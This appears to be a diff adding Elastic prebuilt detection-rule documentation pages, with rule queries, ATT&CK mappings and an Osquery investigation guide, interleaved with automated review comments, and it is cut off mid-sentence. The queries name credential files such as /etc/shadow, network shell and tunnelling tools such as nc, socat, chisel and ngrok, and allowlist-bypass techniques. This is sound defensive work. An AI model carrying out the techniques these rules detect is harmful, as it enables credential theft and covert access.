b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-symbolic-link-created.asciidoc 
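Review bot: In the Suspicious Startup Shell Folder Modification query, the benign-path exclusions are hard-coded to the C: drive (`"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup"` and `"C:\\Users\\*\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup"`), whereas the other Windows rules in this package use the `?:\\` drive wildcard; a host whose profiles or ProgramData live on another drive would alert on the default values, so `"?:\\Users\\*\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup"` and the matching ProgramData form would be safer. In the investigation guide, "Validate if the activity is not related to planned patches" reads awkwardly; "Validate that the activity is not related to" is the intended sense.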
@@ -0,0 +1,92 @@ +[[prebuilt-rule-8-10-5-suspicious-symbolic-link-created]] +=== Suspicious Symbolic Link Created + +Identifies the creation of a symbolic link to a suspicious file or location. A symbolic link is a reference to a file or directory that acts as a pointer or shortcut, allowing users to access the target file or directory from a different location in the file system. An attacker can potentially leverage symbolic links for privilege escalation by tricking a privileged process into following the symbolic link to a sensitive file, giving the attacker access to data or capabilities they would not normally have. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* +* endgame-* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Privilege Escalation +* Tactic: Credential Access +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 3 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "linux" and event.action in ("exec", "exec_event") and +event.type == "start" and process.name == "ln" and process.args in ("-s", "-sf") and + ( + /* suspicious files */ + (process.args in ("/etc/shadow", "/etc/shadow-", "/etc/shadow~", "/etc/gshadow", "/etc/gshadow-") or + (process.working_directory == "/etc" and process.args in ("shadow", "shadow-", "shadow~", "gshadow", "gshadow-"))) or + + /* suspicious bins */ + (process.args in ("/bin/bash", "/bin/dash", "/bin/sh", "/bin/tcsh", "/bin/csh", "/bin/zsh", "/bin/ksh", "/bin/fish") or + (process.working_directory == "/bin" and process.args : ("bash", "dash", "sh", "tcsh", 
"csh", "zsh", "ksh", "fish"))) or + (process.args in ("/usr/bin/bash", "/usr/bin/dash", "/usr/bin/sh", "/usr/bin/tcsh", "/usr/bin/csh", "/usr/bin/zsh", "/usr/bin/ksh", "/usr/bin/fish") or + (process.working_directory == "/usr/bin" and process.args in ("bash", "dash", "sh", "tcsh", "csh", "zsh", "ksh", "fish"))) or + + /* suspicious locations */ + (process.args : ("/etc/cron.d/*", "/etc/cron.daily/*", "/etc/cron.hourly/*", "/etc/cron.weekly/*", "/etc/cron.monthly/*")) or + (process.args : ("/home/*/.ssh/*", "/root/.ssh/*","/etc/sudoers.d/*", "/dev/shm/*")) + ) and + process.parent.name in ("bash", "dash", "ash", "sh", "tcsh", "csh", "zsh", "ksh", "fish") and + not user.Ext.real.id == "0" and not group.Ext.real.id == "0" + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Abuse Elevation Control Mechanism +** ID: T1548 +** Reference URL: https://attack.mitre.org/techniques/T1548/ +* Tactic: +** Name: Credential Access +** ID: TA0006 +** Reference URL: https://attack.mitre.org/tactics/TA0006/ +* Technique: +** Name: OS Credential Dumping +** ID: T1003 +** Reference URL: https://attack.mitre.org/techniques/T1003/ +* Sub-technique: +** Name: /etc/passwd and /etc/shadow +** ID: T1003.008 +** Reference URL: https://attack.mitre.org/techniques/T1003/008/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-system-commands-executed-by-previously-unknown-executable.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-system-commands-executed-by-previously-unknown-executable.asciidoc new file mode 100644 index 0000000000..f34538bfe2 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-system-commands-executed-by-previously-unknown-executable.asciidoc 
@@ -0,0 +1,73 @@ +[[prebuilt-rule-8-10-5-suspicious-system-commands-executed-by-previously-unknown-executable]] +=== Suspicious System Commands Executed by Previously Unknown Executable + +This rule monitors for the execution of several commonly used system commands executed by a previously unknown executable located in commonly abused directories. An alert from this rule can indicate the presence of potentially malicious activity, such as the execution of unauthorized or suspicious processes attempting to run malicious code. Detecting and investigating such behavior can help identify and mitigate potential security threats, protecting the system and its data from potential compromise. + +*Rule type*: new_terms + +*Rule indices*: + +* logs-endpoint.events.* +* endgame-* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Execution +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 103 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +host.os.type:linux and event.category:process and event.action:(exec or exec_event or fork or fork_event) and +process.executable:( + /bin/* or /usr/bin/* or /usr/share/* or /tmp/* or /var/tmp/* or /dev/shm/* or + /etc/init.d/* or /etc/rc*.d/* or /etc/crontab or /etc/cron.*/* or /etc/update-motd.d/* or + /usr/lib/update-notifier/* or /home/*/.* or /boot/* or /srv/* or /run/*) + and process.args:(whoami or id or hostname or uptime or top or ifconfig or netstat or route or ps or pwd or ls) and + not process.name:(sudo or which or whoami or id or hostname or uptime or top or netstat or ps or pwd or ls or apt or + dpkg or 
yum or rpm or dnf or dockerd or docker or snapd or snap) and + not process.parent.executable:(/bin/* or /usr/bin/* or /run/k3s/* or /etc/network/* or /opt/Elastic/*) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: Unix Shell +** ID: T1059.004 +** Reference URL: https://attack.mitre.org/techniques/T1059/004/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-termination-of-esxi-process.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-termination-of-esxi-process.asciidoc new file mode 100644 index 0000000000..461ca7bedf --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-termination-of-esxi-process.asciidoc 
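Review bot: The Suspicious System Commands Executed by Previously Unknown Executable page declares `*Rule type*: new_terms` but shows neither the field whose new values trigger the alert nor the history window, so a reader cannot tell what "previously unknown executable" means or how long the baseline is; the generator should emit those new_terms parameters next to the query. Note also that `process.executable:(/bin/* or /usr/bin/* ...)` combined with `not process.parent.executable:(/bin/* or /usr/bin/* ...)` excludes every execution spawned by a shell installed in /bin or /usr/bin, which narrows the rule far more than the description suggests and deserves a sentence there.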
@@ -0,0 +1,62 @@ +[[prebuilt-rule-8-10-5-suspicious-termination-of-esxi-process]] +=== Suspicious Termination of ESXI Process + +Identifies instances where VMware processes, such as "vmware-vmx" or "vmx," are terminated on a Linux system by a "kill" command. The rule monitors for the "end" event type, which signifies the termination of a process. The presence of a "kill" command as the parent process for terminating VMware processes may indicate that a threat actor is attempting to interfere with the virtualized environment on the targeted system. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.bleepingcomputer.com/news/security/massive-esxiargs-ransomware-attack-targets-vmware-esxi-servers-worldwide/ + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Impact +* Data Source: Elastic Defend + +*Version*: 4 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "linux" and event.type == "end" and process.name : ("vmware-vmx", "vmx") +and process.parent.name : "kill" + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Impact +** ID: TA0040 +** Reference URL: https://attack.mitre.org/tactics/TA0040/ +* Technique: +** Name: Service Stop +** ID: T1489 +** Reference URL: https://attack.mitre.org/techniques/T1489/ 
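Review bot: In the Suspicious Termination of ESXI Process query, `process.parent.name : "kill"` is evaluated on the `end` event of vmware-vmx/vmx, and `process.parent` on that event is the process that spawned the VMX, not the process that sent the signal; a `kill` invocation (usually a shell builtin, and in any case not the parent) will not appear there, so the condition will rarely if ever match. Either document the data-source assumption that makes it valid or rework the logic, for example by alerting on a `kill`/`pkill` exec whose `process.args` reference the VMX processes.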
diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-utility-launched-via-proxychains.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-utility-launched-via-proxychains.asciidoc new file mode 100644 index 0000000000..3368ca503d --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-utility-launched-via-proxychains.asciidoc 
@@ -0,0 +1,65 @@ +[[prebuilt-rule-8-10-5-suspicious-utility-launched-via-proxychains]] +=== Suspicious Utility Launched via ProxyChains + +This rule monitors for the execution of suspicious linux tools through ProxyChains. ProxyChains is a command-line tool that enables the routing of network connections through intermediary proxies, enhancing anonymity and enabling access to restricted resources. Attackers can exploit the ProxyChains utility to hide their true source IP address, evade detection, and perform malicious activities through a chain of proxy servers, potentially masking their identity and intentions. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://blog.bitsadmin.com/living-off-the-foreign-land-windows-as-offensive-platform + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Command and Control +* Data Source: Elastic Defend + +*Version*: 2 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "linux" and event.action == "exec" and event.type == "start" and +process.name == "proxychains" and process.args : ( + "ssh", "sshd", "sshuttle", "socat", "iodine", "iodined", "dnscat", "hans", "hans-ubuntu", "ptunnel-ng", + "ssf", "3proxy", "ngrok", "gost", "pivotnacci", "chisel*", "nmap", "ping", "python*", "php*", "perl", "ruby", + "lua*", "openssl", "nc", "netcat", "ncat", "telnet", "awk", "java", "telnet", "ftp", "curl", "wget") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Command and Control +** ID: TA0011 +** Reference URL: https://attack.mitre.org/tactics/TA0011/ +* 
Technique: +** Name: Protocol Tunneling +** ID: T1572 +** Reference URL: https://attack.mitre.org/techniques/T1572/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-werfault-child-process.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-werfault-child-process.asciidoc new file mode 100644 index 0000000000..05c24ab14e --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-werfault-child-process.asciidoc 
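Review bot: In the Suspicious Utility Launched via ProxyChains query, `"telnet"` appears twice in the `process.args` list; drop the duplicate. The rule also only matches `process.name == "proxychains"`, while distributions that ship proxychains-ng install the binary as `proxychains4`, so `process.name in ("proxychains", "proxychains4")` would cover the current fork as well.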
@@ -0,0 +1,109 @@ +[[prebuilt-rule-8-10-5-suspicious-werfault-child-process]] +=== Suspicious WerFault Child Process + +A suspicious WerFault child process was detected, which may indicate an attempt to run via the SilentProcessExit registry key manipulation. Verify process details such as command line, network connections and file writes. + +*Rule type*: eql + +*Rule indices*: + +* winlogbeat-* +* logs-endpoint.events.* +* logs-windows.* +* endgame-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.hexacorn.com/blog/2019/09/19/silentprocessexit-quick-look-under-the-hood/ +* https://www.hexacorn.com/blog/2019/09/20/werfault-command-line-switches-v0-1/ +* https://github.com/sbousseaden/EVTX-ATTACK-SAMPLES/blob/master/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx +* https://blog.menasec.net/2021/01/ + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Defense Evasion +* Tactic: Persistence +* Tactic: Privilege Escalation +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 108 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- + +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "windows" and event.type == "start" and + + process.parent.name : "WerFault.exe" and + + /* args -s and -t used to execute a process via SilentProcessExit mechanism */ + (process.parent.args : "-s" and process.parent.args : "-t" and process.parent.args : "-c") and + + not process.executable : ("?:\\Windows\\SysWOW64\\Initcrypt.exe", "?:\\Program Files 
(x86)\\Heimdal\\Heimdal.Guard.exe") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Masquerading +** ID: T1036 +** Reference URL: https://attack.mitre.org/techniques/T1036/ +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Event Triggered Execution +** ID: T1546 +** Reference URL: https://attack.mitre.org/techniques/T1546/ +* Sub-technique: +** Name: Image File Execution Options Injection +** ID: T1546.012 +** Reference URL: https://attack.mitre.org/techniques/T1546/012/ +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Event Triggered Execution +** ID: T1546 +** Reference URL: https://attack.mitre.org/techniques/T1546/ +* Sub-technique: +** Name: Image File Execution Options Injection +** ID: T1546.012 +** Reference URL: https://attack.mitre.org/techniques/T1546/012/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-windows-process-cluster-spawned-by-a-host.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-windows-process-cluster-spawned-by-a-host.asciidoc new file mode 100644 index 0000000000..4a8995e7ed --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-windows-process-cluster-spawned-by-a-host.asciidoc 
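Review bot: In the Suspicious WerFault Child Process query, the comment `/* args -s and -t used to execute a process via SilentProcessExit mechanism */` does not agree with the condition beneath it, which also requires `process.parent.args : "-c"`; update the comment (or the condition) so they match. The `==== Investigation guide` section is an empty `[source, markdown]` block that renders as an empty box; populate it or omit the heading when the rule ships no guide.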
@@ -0,0 +1,59 @@ +[[prebuilt-rule-8-10-5-suspicious-windows-process-cluster-spawned-by-a-host]] +=== Suspicious Windows Process Cluster Spawned by a Host + +A machine learning job combination has detected a set of one or more suspicious Windows processes with unusually high scores for malicious probability. These process(es) have been classified as malicious in several ways. The process(es) were predicted to be malicious by the ProblemChild supervised ML model. If the anomaly contains a cluster of suspicious processes, each process has the same host name, and the aggregate score of the event cluster was calculated to be unusually high by an unsupervised ML model. Such a cluster often contains suspicious or malicious activity, possibly involving LOLbins, that may be resistant to detection using conventional search rules. + +*Rule type*: machine_learning + +*Rule indices*: None + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 15m + +*Searches indices from*: now-45m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html +* https://docs.elastic.co/en/integrations/problemchild +* https://www.elastic.co/security-labs/detecting-living-off-the-land-attacks-with-new-elastic-integration + +*Tags*: + +* Use Case: Living off the Land Attack Detection +* Rule Type: ML +* Rule Type: Machine Learning +* Tactic: Defense Evasion + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Masquerading +** ID: T1036 +** Reference URL: 
https://attack.mitre.org/techniques/T1036/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-windows-process-cluster-spawned-by-a-parent-process.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-windows-process-cluster-spawned-by-a-parent-process.asciidoc new file mode 100644 index 0000000000..72398c7a6c --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-windows-process-cluster-spawned-by-a-parent-process.asciidoc 
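Review bot: Suspicious Windows Process Cluster Spawned by a Host lacks the `Domain: Endpoint` and `OS: Windows` tags that its sibling rules (Spawned by a Parent Process, Spawned by a User) carry, and all three list both `Rule Type: ML` and `Rule Type: Machine Learning`, which looks like a duplicated tag; the investigation guide block is empty here too. The description's sentence "If the anomaly contains a cluster of suspicious processes, each process has the same host name, and the aggregate score ... was calculated to be unusually high" states a condition with no consequent and should be rephrased.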
@@ -0,0 +1,61 @@ +[[prebuilt-rule-8-10-5-suspicious-windows-process-cluster-spawned-by-a-parent-process]] +=== Suspicious Windows Process Cluster Spawned by a Parent Process + +A machine learning job combination has detected a set of one or more suspicious Windows processes with unusually high scores for malicious probability. These process(es) have been classified as malicious in several ways. The process(es) were predicted to be malicious by the ProblemChild supervised ML model. If the anomaly contains a cluster of suspicious processes, each process has the same parent process name, and the aggregate score of the event cluster was calculated to be unusually high by an unsupervised ML model. Such a cluster often contains suspicious or malicious activity, possibly involving LOLbins, that may be resistant to detection using conventional search rules. + +*Rule type*: machine_learning + +*Rule indices*: None + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 15m + +*Searches indices from*: now-45m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html +* https://docs.elastic.co/en/integrations/problemchild +* https://www.elastic.co/security-labs/detecting-living-off-the-land-attacks-with-new-elastic-integration + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Living off the Land Attack Detection +* Rule Type: ML +* Rule Type: Machine Learning +* Tactic: Defense Evasion + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Masquerading +** 
ID: T1036 +** Reference URL: https://attack.mitre.org/techniques/T1036/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-windows-process-cluster-spawned-by-a-user.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-windows-process-cluster-spawned-by-a-user.asciidoc new file mode 100644 index 0000000000..a0267ed570 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-windows-process-cluster-spawned-by-a-user.asciidoc 
@@ -0,0 +1,61 @@ +[[prebuilt-rule-8-10-5-suspicious-windows-process-cluster-spawned-by-a-user]] +=== Suspicious Windows Process Cluster Spawned by a User + +A machine learning job combination has detected a set of one or more suspicious Windows processes with unusually high scores for malicious probability. These process(es) have been classified as malicious in several ways. The process(es) were predicted to be malicious by the ProblemChild supervised ML model. If the anomaly contains a cluster of suspicious processes, each process has the same user name, and the aggregate score of the event cluster was calculated to be unusually high by an unsupervised ML model. Such a cluster often contains suspicious or malicious activity, possibly involving LOLbins, that may be resistant to detection using conventional search rules. + +*Rule type*: machine_learning + +*Rule indices*: None + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 15m + +*Searches indices from*: now-45m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html +* https://docs.elastic.co/en/integrations/problemchild +* https://www.elastic.co/security-labs/detecting-living-off-the-land-attacks-with-new-elastic-integration + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Living off the Land Attack Detection +* Rule Type: ML +* Rule Type: Machine Learning +* Tactic: Defense Evasion + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Masquerading +** ID: T1036 +** Reference URL: 
https://attack.mitre.org/techniques/T1036/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-wmic-xsl-script-execution.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-wmic-xsl-script-execution.asciidoc new file mode 100644 index 0000000000..6a87766496 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-wmic-xsl-script-execution.asciidoc 
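Review bot: The `==== Investigation guide` section in the Suspicious Windows Process Cluster Spawned by a User file is an empty `[source, markdown]` block, and the tag list carries both `Rule Type: ML` and `Rule Type: Machine Learning`. Either populate the guide (the Zoom and System Shells files in this same patch show the expected "Triage and analysis" layout) or omit the heading and its empty listing so the rendered page does not show a blank block, and drop one of the two redundant rule-type tags.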
@@ -0,0 +1,76 @@ +[[prebuilt-rule-8-10-5-suspicious-wmic-xsl-script-execution]] +=== Suspicious WMIC XSL Script Execution + +Identifies WMIC allowlist bypass techniques by alerting on suspicious execution of scripts. When WMIC loads scripting libraries it may be indicative of an allowlist bypass. + +*Rule type*: eql + +*Rule indices*: + +* winlogbeat-* +* logs-endpoint.events.* +* logs-windows.* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Defense Evasion +* Tactic: Execution +* Data Source: Elastic Defend + +*Version*: 106 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +sequence by process.entity_id with maxspan = 2m +[process where host.os.type == "windows" and event.type == "start" and + (process.name : "WMIC.exe" or process.pe.original_file_name : "wmic.exe") and + process.args : ("format*:*", "/format*:*", "*-format*:*") and + not process.command_line : "* /format:table *"] +[any where host.os.type == "windows" and (event.category == "library" or (event.category == "process" and event.action : "Image loaded*")) and + (dll.name : ("jscript.dll", "vbscript.dll") or file.name : ("jscript.dll", "vbscript.dll"))] + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: XSL Script Processing +** ID: T1220 +** Reference URL: https://attack.mitre.org/techniques/T1220/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Windows Management 
Instrumentation +** ID: T1047 +** Reference URL: https://attack.mitre.org/techniques/T1047/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-zoom-child-process.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-zoom-child-process.asciidoc new file mode 100644 index 0000000000..654faa8898 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-zoom-child-process.asciidoc 
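Review bot: In the first sequence step of the Suspicious WMIC XSL Script Execution query, the exclusion `not process.command_line : "* /format:table *"` needs a space on both sides of `/format:table`, so a command line that ends with `/format:table` (no trailing argument) is not exempted by the first step; if the intent is to exclude every table-format invocation, `"*/format:table*"` or a `process.args` test would be more robust. `*References*: None` could also carry a pointer for the description's "allowlist bypass" claim, since the only link in the file is the T1220 entry in the ATT&CK block.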
@@ -0,0 +1,136 @@ +[[prebuilt-rule-8-10-5-suspicious-zoom-child-process]] +=== Suspicious Zoom Child Process + +A suspicious Zoom child process was detected, which may indicate an attempt to run unnoticed. Verify process details such as command line, network connections, file writes and associated file signature details as well. + +*Rule type*: eql + +*Rule indices*: + +* winlogbeat-* +* logs-endpoint.events.* +* logs-windows.* +* endgame-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Defense Evasion +* Tactic: Execution +* Data Source: Elastic Endgame +* Resources: Investigation Guide +* Data Source: Elastic Defend + +*Version*: 108 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and analysis + +### Investigating Suspicious Zoom Child Process + +By examining the specific traits of Windows binaries -- such as process trees, command lines, network connections, registry modifications, and so on -- it's possible to establish a baseline of normal activity. Deviations from this baseline can indicate malicious activity, such as masquerading, and deserve further investigation. + +This rule identifies a potential malicious process masquerading as `Zoom.exe` or exploiting a vulnerability in the application causing it to execute code. + +> **Note**: +> This investigation guide uses the {security-guide}/security/master/invest-guide-run-osquery.html[Osquery Markdown Plugin] introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide. 
+ +#### Possible investigation steps + +- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures. +- Investigate other alerts associated with the user/host during the past 48 hours. +- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes. +- Examine the command line of the child process to determine which commands or scripts were executed. +- Examine the host for derived artifacts that indicate suspicious activities: + - Analyze the process executable using a private sandboxed analysis system. + - Observe and collect information about the following activities in both the sandbox and the alert subject host: + - Attempts to contact external domains and addresses. + - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`. + - Examine the DNS cache for suspicious or anomalous entries. + - !{osquery{"label":"Osquery - Retrieve DNS Cache","query":"SELECT * FROM dns_cache"}} + - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree. + - Examine the host services for suspicious or anomalous entries. 
+ - !{osquery{"label":"Osquery - Retrieve All Services","query":"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services"}} + - !{osquery{"label":"Osquery - Retrieve Services Running on User Accounts","query":"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\nuser_account == null)\n"}} + - !{osquery{"label":"Osquery - Retrieve Service Unsigned Executables with Virustotal Link","query":"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\n"}} + - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc. +- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts. + + +### False positive analysis + +- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary. + +### Response and remediation + +- Initiate the incident response process based on the outcome of the triage. +- Isolate the involved host to prevent further post-compromise behavior. +- If the triage identified malware, search the 